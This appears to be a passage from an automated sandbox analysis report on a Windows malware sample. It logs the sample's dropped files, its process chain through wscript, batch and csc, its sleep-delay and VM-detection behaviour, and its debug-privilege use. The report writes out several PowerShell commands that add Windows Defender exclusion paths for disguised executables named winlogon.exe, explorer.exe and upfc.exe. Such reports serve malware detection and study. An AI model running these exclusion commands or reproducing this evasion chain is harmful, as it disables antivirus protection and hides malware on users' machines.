                                    Source: C:\Browserhost\intoHostperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\XrvErxiE.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exe TID: 4720Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Recovery\upfc.exe TID: 3192Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Recovery\upfc.exe TID: 7100Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe TID: 7652Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe TID: 7964Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exe TID: 7916Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep count: 2260 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep count: 2077 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep count: 1944 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep count: 2053 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -13835058055282155s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep count: 2883 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2232Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep count: 1695 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exe TID: 8020Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exe TID: 8024Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe TID: 7936Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Browserhost\intoHostperf.exe TID: 7988Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Browserhost\intoHostperf.exe TID: 7980Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Browserhost\intoHostperf.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Recovery\upfc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Recovery\upfc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Browserhost\intoHostperf.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Browserhost\intoHostperf.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0041A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0041A69B
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0042C220
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0043B348 FindFirstFileExA,0_2_0043B348
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042E6A3 VirtualQuery,GetSystemInfo,0_2_0042E6A3
                                    Source: C:\Browserhost\intoHostperf.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\upfc.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\upfc.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Browserhost\intoHostperf.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Browserhost\intoHostperf.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: intoHostperf.exe, 00000005.00000002.2406845361.000000001C4C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                                    Source: wscript.exe, 00000002.00000003.2078792761.0000000002520000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: DCobxod.exe, winlogon.exe.5.dr, upfc.exe.5.dr, intoHostperf.exe.0.drBinary or memory string: TA78xqEmUU7dB6KMXiyr
                                    Source: DCobxod.exe, winlogon.exe.5.dr, upfc.exe.5.dr, intoHostperf.exe.0.drBinary or memory string: cR81GxEmH8h5ktqEmuqY
                                    Source: intoHostperf.exe, 00000005.00000002.2377746189.000000001B7A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\X;!
                                    Source: C:\Users\user\Desktop\DCobxod.exeAPI call chain: ExitProcess graph end nodegraph_0-25035
                                    Source: C:\Browserhost\intoHostperf.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042F838
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_00437DEE mov eax, dword ptr fs:[00000030h]0_2_00437DEE
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0043C030 GetProcessHeap,0_2_0043C030
                                    Source: C:\Browserhost\intoHostperf.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess token adjusted: Debug
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeProcess token adjusted: Debug
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeProcess token adjusted: Debug
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess token adjusted: Debug
                                    Source: C:\Browserhost\intoHostperf.exeProcess token adjusted: Debug
                                    Source: C:\Browserhost\intoHostperf.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042F838
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042F9D5 SetUnhandledExceptionFilter,0_2_0042F9D5
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0042FBCA
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_00438EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00438EBD
                                    Source: C:\Browserhost\intoHostperf.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Adds a directory exclusion to Windows Defender
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe'
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe'
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\winlogon.exe'
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\explorer.exe'
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\LaSqLWtOcizKrlm.exe'
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\intoHostperf.exe'
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\winlogon.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\explorer.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\LaSqLWtOcizKrlm.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\intoHostperf.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserhost\I0GR.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Browserhost\intoHostperf.exe "C:\Browserhost/intoHostperf.exe"Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline"Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.cmdline"Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\winlogon.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\explorer.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\LaSqLWtOcizKrlm.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\intoHostperf.exe'Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE67.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD.tmp" "c:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042F654 cpuid 0_2_0042F654
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0042AF0F
                                    Source: C:\Browserhost\intoHostperf.exeQueries volume information: C:\Browserhost\intoHostperf.exe VolumeInformationJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                    Source: C:\Recovery\upfc.exeQueries volume information: C:\Recovery\upfc.exe VolumeInformationJump to behavior
                                    Source: C:\Recovery\upfc.exeQueries volume information: C:\Recovery\upfc.exe VolumeInformationJump to behavior
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeQueries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe VolumeInformation
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeQueries volume information: C:\Browserhost\LaSqLWtOcizKrlm.exe VolumeInformation
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeQueries volume information: C:\Browserhost\LaSqLWtOcizKrlm.exe VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
